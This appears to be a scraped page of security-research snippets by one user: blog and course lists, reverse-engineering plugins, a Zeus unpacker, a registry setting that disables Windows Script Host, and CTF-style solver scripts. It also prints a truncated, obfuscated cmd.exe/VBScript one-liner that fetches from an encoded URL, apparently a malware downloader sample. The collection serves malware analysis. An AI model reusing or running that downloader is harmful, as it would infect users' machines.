trietptm

Blogs on Computer Security:

https://antelox.blogspot.com/
http://www.dumpanalysis.org/blog/
http://www.abuse.ch/
http://zairon.wordpress.com/
http://androguard.blogspot.com/
http://blog.w4kfu.com/
http://akhenath0n.blogspot.com/
http://diarrlf.wordpress.com/

trietptm

Accredited Universities

• List of Centers of Academic Excellence for Cyber Operations
• National Centers of Academic Excellence in Information Assurance (IA)/Cyber Defense (CD)
• /r/netsec's Q3 2013 Academic Program Thread
• /r/netsec's Q1 2013 Academic Program Thread

Full Online Courses

• NYU Polytechnic School of Engineering ISIS Lab's Hack Night Source Code Auditing, Web Security, Reverse Engineering, Exploitation, Post-Exploitation, Application Security
• OpenSecurityTraining Reverse Engineering, Exploitation, Forensics, Malware Analysis
• [Florida State University's Offensive Secu

trietptm

Windowsで使ってるソフトウェアメモ

Webブラウザ
	Firefox
		使ってるAddon
		AutoPagerize
			自動でページ継ぎ足し
		Navigational Sounds
			右クリックしたときに音でるようにするやつ
		Secure Login

trietptm

cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT

trietptm

'''
IDAPython plugin that adds the contents of a file as a new segment in an existing idb.
Prompts the user for:
  - file path
  - segment name
  - segment starting offset
  
Useful for reversing engineering packed software and shellcode.

Author: Willi Ballenthin <[email protected]>

trietptm

# -*- coding: utf-8 -*-

# LICENSE INFORMATION:
#   Please treat this script as CC0

from immlib import *

imm = Debugger()

class KamikazeHook(LogBpHook):

trietptm

// Generic Zeus malware unpacker (ResumeThread)
// by Miroslav Stampar (@stamparm)
// http://about.me/stamparm

VAR ResumeThread
VAR msg
VAR xname
VAR xloc
VAR xsize

trietptm

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script Host\Settings]
"Enabled"="0"

trietptm

#!/usr/bin/env python
from z3 import *


def display_model(m):
    block = {}
    for x in m:
        if 'b' in str(x):
            block[ord(str(x)[-1:])] = int(str(m[x]))

trietptm

#!/usr/bin/env sage -python2

from sage.all import *

e1 = long(599703852157208324988436697659896404638315905290324375700570316485421693)
e2 = long(2021187385200166516022746434619391941987919206967476592818217288363509)

print 'gcd(e1, e2) = ' + str(gcd(e1, e2)) # should be 1

n = long(108039548283467910018636019706918049787296862983920390620425680109149061265582938100265640505395436176923520902062289606379329490555998996693285930619495040456388113166495283026905991110314710632437395833112529488024010984327573108928719840003018232385552027586272040584786259207191357206321725581066222359269709853312236804681275337051689984480610347322381805920314518020927280061535012383180989715215061621017100281215170089223279840979641688194933238176625422507335413025975742216947757245112001827202742177202602339368271393570814426349)